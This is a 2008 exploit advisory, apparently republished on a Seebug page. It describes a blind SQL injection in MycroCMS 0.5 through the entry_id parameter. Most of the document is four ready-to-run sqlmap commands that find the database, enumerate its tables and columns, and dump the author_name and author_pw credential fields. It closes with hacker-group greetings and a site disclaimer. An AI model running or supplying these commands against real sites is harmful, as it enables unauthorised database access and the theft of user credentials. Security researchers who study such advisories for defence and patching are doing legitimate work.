======================================================= MycroCMS 0.5 Remote Blind SQL Injection Vulnerability ======================================================= ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 11 June 2008 SITE : www.citec.us ##################################################### APPLICATION : MycroCMS VERSION : 0.5 (Lastest Version) DOWNLOAD : http://downloads.sourceforge.net/mycrocms ##################################################### ---Remote Blind SQL Injection--- ***magic_quotes_gpc = off*** ----------------- Vulnerable Path ----------------- [+] http://[Target]/[mycrocms_path]/mycrocms/?entry_id=[Blind SQL] --------------------------------- Blind SQL Injection with SqlMap --------------------------------- [+] Find DB name POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" --current-db -u http://localhost/mycrocms/?entry_id=3 [+] Enumerate All Tables (Use Database "mycrocms") POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" --tables -u http://localhost/mycrocms/?entry_id=3 [+] Enumerate All Columns in Table (Use Table "mbauthor") POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" --columns -u http://localhost/mycrocms/?entry_id=3 [+] Dump All Data in Column (Use Column "author_name" and "author_pw") POC Exploit: ./sqlmap.py -p "entry_id" -a "./txt/user-agents.txt" -D "mycrocms" -T "mbauthor" -C author_name,author_pw --dump -u http://localhost/mycrocms/?entry_id=3 ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## # milw0rm.com [2008-06-11]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论